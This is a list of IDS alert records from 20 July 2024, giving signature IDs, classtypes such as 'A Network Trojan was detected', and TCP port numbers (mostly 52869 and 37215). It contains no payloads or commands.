                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:44.357595
                      SID:2025132
                      Source Port:37156
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:51.309417
                      SID:2027339
                      Source Port:49200
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.802333
                      SID:2027339
                      Source Port:43274
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.322089
                      SID:2027339
                      Source Port:51336
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.487901
                      SID:2027339
                      Source Port:56144
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.325662
                      SID:2829579
                      Source Port:40838
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.339999
                      SID:2835222
                      Source Port:38120
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.290290
                      SID:2025132
                      Source Port:47628
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:18.564435
                      SID:2027339
                      Source Port:46272
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.662338
                      SID:2835222
                      Source Port:38402
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.469881
                      SID:2027339
                      Source Port:35628
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.112035
                      SID:2025132
                      Source Port:43230
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.561304
                      SID:2027339
                      Source Port:33204
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.632555
                      SID:2831300
                      Source Port:37456
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.588014
                      SID:2027339
                      Source Port:44588
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.535100
                      SID:2831300
                      Source Port:33614
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.133262
                      SID:2027339
                      Source Port:54676
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:12.667310
                      SID:2027339
                      Source Port:42062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:26.043403
                      SID:2027339
                      Source Port:46360
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.993987
                      SID:2831300
                      Source Port:56458
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.493809
                      SID:2027339
                      Source Port:33020
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.219202
                      SID:2831300
                      Source Port:46940
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:06.458215
                      SID:2025132
                      Source Port:36462
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.437168
                      SID:2027339
                      Source Port:50820
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.469321
                      SID:2027339
                      Source Port:44458
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.359417
                      SID:2025132
                      Source Port:53634
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.270124
                      SID:2027339
                      Source Port:48982
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.245639
                      SID:2027339
                      Source Port:38408
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.095402
                      SID:2831300
                      Source Port:39854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.930253
                      SID:2027339
                      Source Port:32924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.137269
                      SID:2829579
                      Source Port:51496
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.795331
                      SID:2027339
                      Source Port:56420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:10.782901
                      SID:2027339
                      Source Port:51518
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.192675
                      SID:2027339
                      Source Port:37566
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.861533
                      SID:2025132
                      Source Port:37288
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.201041
                      SID:2027339
                      Source Port:50716
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.325773
                      SID:2829579
                      Source Port:46180
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.965851
                      SID:2027339
                      Source Port:43644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:25.634766
                      SID:2025132
                      Source Port:50236
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:29.727366
                      SID:2027339
                      Source Port:33098
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.833027
                      SID:2829579
                      Source Port:41334
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:21.974244
                      SID:2027339
                      Source Port:56634
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.648426
                      SID:2829579
                      Source Port:43456
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.458812
                      SID:2027339
                      Source Port:57776
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.389146
                      SID:2835222
                      Source Port:49104
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.181822
                      SID:2025132
                      Source Port:43348
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:31.320054
                      SID:2025132
                      Source Port:36082
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:16.731750
                      SID:2027339
                      Source Port:37612
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:36.472084
                      SID:2831300
                      Source Port:46330
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:12.549242
                      SID:2025132
                      Source Port:43112
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.501247
                      SID:2829579
                      Source Port:56154
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:54.833146
                      SID:2831300
                      Source Port:39282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.540063
                      SID:2025132
                      Source Port:43376
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:27.858951
                      SID:2025132
                      Source Port:40768
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.193921
                      SID:2027339
                      Source Port:37256
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.839035
                      SID:2027339
                      Source Port:47874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.457721
                      SID:2027339
                      Source Port:36068
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.502843
                      SID:2831300
                      Source Port:60896
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:48.858199
                      SID:2835222
                      Source Port:46176
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.802006
                      SID:2025132
                      Source Port:54038
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.129772
                      SID:2829579
                      Source Port:60814
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.290476
                      SID:2025132
                      Source Port:50258
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.830692
                      SID:2025132
                      Source Port:47790
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.928848
                      SID:2027339
                      Source Port:59406
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.499861
                      SID:2027339
                      Source Port:51130
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.606012
                      SID:2027339
                      Source Port:47396
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.981181
                      SID:2025132
                      Source Port:41850
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:06.631877
                      SID:2835222
                      Source Port:59190
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.498027
                      SID:2835222
                      Source Port:49256
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.830272
                      SID:2835222
                      Source Port:44722
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.048493
                      SID:2027339
                      Source Port:59600
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.221844
                      SID:2835222
                      Source Port:52650
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.237871
                      SID:2829579
                      Source Port:59948
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.187454
                      SID:2027339
                      Source Port:38370
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.827264
                      SID:2831300
                      Source Port:41344
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.827188
                      SID:2025132
                      Source Port:40270
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.501247
                      SID:2829579
                      Source Port:42870
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.707199
                      SID:2025132
                      Source Port:53602
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.474845
                      SID:2831300
                      Source Port:49658
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:13.684507
                      SID:2027339
                      Source Port:60418
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.988385
                      SID:2027339
                      Source Port:38752
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.113509
                      SID:2025132
                      Source Port:35976
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.626588
                      SID:2835222
                      Source Port:60812
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:34.260416
                      SID:2027339
                      Source Port:37838
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.612113
                      SID:2027339
                      Source Port:37742
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.414465
                      SID:2835222
                      Source Port:42402
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.180899
                      SID:2829579
                      Source Port:56228
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.347577
                      SID:2831300
                      Source Port:40988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.287009
                      SID:2025132
                      Source Port:50638
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.746219
                      SID:2027339
                      Source Port:52780
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.861088
                      SID:2829579
                      Source Port:58174
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.101729
                      SID:2829579
                      Source Port:35668
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.382027
                      SID:2025132
                      Source Port:34614
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.018219
                      SID:2027339
                      Source Port:36466
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.244494
                      SID:2027339
                      Source Port:49978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.348979
                      SID:2025132
                      Source Port:49308
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.600216
                      SID:2835222
                      Source Port:33654
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.201174
                      SID:2027339
                      Source Port:55798
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.515904
                      SID:2835222
                      Source Port:45674
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.445004
                      SID:2027339
                      Source Port:43962
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.581239
                      SID:2831300
                      Source Port:50028
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:09.712957
                      SID:2025132
                      Source Port:49420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.830272
                      SID:2829579
                      Source Port:40202
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.323663
                      SID:2835222
                      Source Port:34922
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.409134
                      SID:2835222
                      Source Port:36190
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:44.698080
                      SID:2027339
                      Source Port:36232
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.034294
                      SID:2831300
                      Source Port:50598
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.948716
                      SID:2025132
                      Source Port:42322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.974933
                      SID:2025132
                      Source Port:35792
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.551649
                      SID:2831300
                      Source Port:57798
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.811748
                      SID:2027339
                      Source Port:53994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.532921
                      SID:2829579
                      Source Port:48872
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.135703
                      SID:2835222
                      Source Port:53132
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.048662
                      SID:2027339
                      Source Port:42992
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:27.822681
                      SID:2027339
                      Source Port:52732
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.268005
                      SID:2027339
                      Source Port:52002
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.467143
                      SID:2025132
                      Source Port:51004
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.766400
                      SID:2025132
                      Source Port:34136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:40.564079
                      SID:2027339
                      Source Port:45310
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.453690
                      SID:2831300
                      Source Port:41902
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.576576
                      SID:2027339
                      Source Port:36760
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:03.190386
                      SID:2025132
                      Source Port:41588
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.850879
                      SID:2027339
                      Source Port:43880
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.488878
                      SID:2027339
                      Source Port:57010
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.468009
                      SID:2835222
                      Source Port:48518
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.160489
                      SID:2027339
                      Source Port:60714
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.237125
                      SID:2027339
                      Source Port:34782
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.474846
                      SID:2831300
                      Source Port:50826
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.065114
                      SID:2025132
                      Source Port:42696
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.377287
                      SID:2025132
                      Source Port:37142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.385438
                      SID:2027339
                      Source Port:40696
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.531553
                      SID:2829579
                      Source Port:38834
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.834038
                      SID:2831300
                      Source Port:37122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.136809
                      SID:2027339
                      Source Port:48092
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:34.305255
                      SID:2025132
                      Source Port:51982
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.124566
                      SID:2835222
                      Source Port:37790
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:54.482380
                      SID:2027339
                      Source Port:33182
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.736347
                      SID:2025132
                      Source Port:33874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.394050
                      SID:2025132
                      Source Port:42840
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:46.119639
                      SID:2829579
                      Source Port:44392
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:17.564288
                      SID:2025132
                      Source Port:46656
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:19.786611
                      SID:2027339
                      Source Port:33442
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.167898
                      SID:2831300
                      Source Port:38302
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.849854
                      SID:2025132
                      Source Port:41822
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.538013
                      SID:2027339
                      Source Port:36866
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:24.616747
                      SID:2027339
                      Source Port:49786
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.645534
                      SID:2025132
                      Source Port:53064
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.238265
                      SID:2835222
                      Source Port:37986
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:28.937691
                      SID:2025132
                      Source Port:60680
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.949221
                      SID:2835222
                      Source Port:46246
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.497165
                      SID:2027339
                      Source Port:57934
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.971787
                      SID:2025132
                      Source Port:40000
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:53.677192
                      SID:2027339
                      Source Port:59786
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.520621
                      SID:2831300
                      Source Port:51380
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.330485
                      SID:2831300
                      Source Port:56874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.331620
                      SID:2027339
                      Source Port:55834
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.257796
                      SID:2025132
                      Source Port:56554
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:07.071207
                      SID:2027339
                      Source Port:52532
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.220682
                      SID:2835222
                      Source Port:35462
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.403603
                      SID:2027339
                      Source Port:51766
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.573762
                      SID:2027339
                      Source Port:33212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.471777
                      SID:2027339
                      Source Port:52034
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.055543
                      SID:2025132
                      Source Port:59520
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:19.828184
                      SID:2027339
                      Source Port:59658
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:55.889998
                      SID:2835222
                      Source Port:44990
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.338927
                      SID:2835222
                      Source Port:59130
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:21.839686
                      SID:2027339
                      Source Port:33196
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.460786
                      SID:2027339
                      Source Port:54190
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:19.714340
                      SID:2027339
                      Source Port:37664
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:09.612324
                      SID:2027339
                      Source Port:37006
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.055909
                      SID:2835222
                      Source Port:43368
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.347950
                      SID:2027339
                      Source Port:55846
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.593709
                      SID:2027339
                      Source Port:39534
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.489811
                      SID:2027339
                      Source Port:38752
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.876249
                      SID:2025132
                      Source Port:34404
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.554912
                      SID:2829579
                      Source Port:50838
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:19.742051
                      SID:2025132
                      Source Port:58674
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.161619
                      SID:2831300
                      Source Port:60900
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.698150
                      SID:2027339
                      Source Port:53356
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.635095
                      SID:2025132
                      Source Port:50896
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.143971
